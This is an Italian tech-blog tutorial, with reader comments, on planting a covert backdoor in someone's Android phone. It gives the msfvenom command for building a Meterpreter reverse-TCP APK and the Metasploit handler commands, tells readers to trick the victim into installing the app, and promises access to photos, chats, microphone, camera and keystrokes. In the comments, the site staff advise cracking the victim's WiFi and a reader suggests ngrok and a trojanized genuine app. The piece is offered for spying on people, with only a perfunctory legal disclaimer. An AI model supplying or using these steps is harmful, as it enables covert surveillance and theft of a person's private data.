
Come spiare un telefono con una backdoor
Da tempo volete venire a conoscenza delle azioni che una persona compie sul proprio cellulare e non resistite più alla tentazione; allora vi spiegherò semplici passaggi mediante i quali potete creare una backdoor, ovvero una porta di accesso segreta, all’interno del dispositivo della vittima, che vi permetterà di svolgere una miriade di azioni, per esempio accedere alle foto, alle conversazioni, attivare il microfono, keylogger e addirittura la fotocamera; il tutto ovviamente sarà invisibile alla persona. Innanzitutto dovrete essere equipaggiati con Kali Linux, piattaforma specializzata negli attacchi di penetration-testing; prima di iniziare, un requisito fondamentale è che il telefono della vittima abbia come sistema operativo Android. A questo punto possiamo iniziare! Per prima cosa aprite un terminale e digitate il seguente comando:
msfvenom -p android/meterpreter/reverse_tcp LHOST=”vostro IP locale” LPORT=”vostra porta locale” R > “nome della backdoor”.apk
Per venire a conoscenza del vostro IP dovrete semplicemente aprire un altro terminale (senza chiudere quello precedente) e digitare “ifconfig”; come porta potete utilizzare una qualsiasi, io vi consiglio la 443, quella di default.
A questo punto mettiamo a nostra disposizione la backdoor che abbiamo creato con il primo comando all’inizio della spiegazione; solitamente la backdoor dovrebbe andarsi a posizionare nella cartella home, noi per comodità la sposteremo sul Desktop (Scrivania).
Benissimo, adesso apriamo metasploit digitando sul terminale il comando “msfconsole”
Una volta giunti qui, cominciamo a digitare una serie di comandi:
-use multi/handler
-set PAYLOAD android/meterpreter/reverse_tcp
-set LHOST “nostro indirizzo IP locale” (dobbiamo inserire lo stesso IP inserito all’inizio)
-set LPORT “nostra porta locale” (anche in questo caso dobbiamo inserire la stessa porta che abbiamo inserito all’inizio)
-show options
-exploit
A questo punto mantenete aperto il terminale in ascolto e installate la backdoor sul dispositivo della vittima; ai tempi di oggi è molto semplice ingannare una persona e di sicuro, con una scusa e con tanta intelligenza, troverete il modo per ottenere ciò che volete.
Installata la backdoor, il terminale la riconoscerà e si aprirà una sessione tra il computer attaccante e il telefono vittima; giunti qui, ci sono tantissimi comandi che possono essere svolti sull’Android che state attaccando, potete conoscerli mediante il comando “help”.
Ricordiamo che entrare a conoscenza di info riservate, senza permesso di accedervi, è violazione della privacy. L’eventuale uso scorretto che farete di queste informazioni sono punibili legalmente e tutto lo staff di Tecnogalaxy.it si esonera da qualsiasi risponsabilità.
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
6 Commenti
Lascia un commento Annulla risposta
I PIÙ LETTI
ARTICOLI RECENTI
Si ma come faccio a installare la backdoor sul telefono della vittima
Ciao! grandissima guida! Come mai secondo te non mi compare il “comando meterpreter>” ?? Eppure quando dal mio android clicco sull’icona del robottino nella console si vede che manda pacchetti dati. Ma posso controllare solo il pc, perché se uso il comando ls escono fuori le directory del pc appunto… boh
Ciao, Prova ad aggiornare metasploit con il comando msfupdate.
Saluti, Alessandro.
e qualora il cellulare non fosse connesso alla nostra stessa rete? la configurazione come cambierebbe?
Sarebbe opportuno bucare la rete WiFi a cui è connesso il telefono della vittima, successivamente collegarsi con quello stesso WiFi e procedere con l’attacco. Spero di esserti stato utile:)
semplice utilizza ngrok.io e fatrat e un apk originale da inviare alla vitima ed il gioco e fatto. scusate il mio italiano sono inglese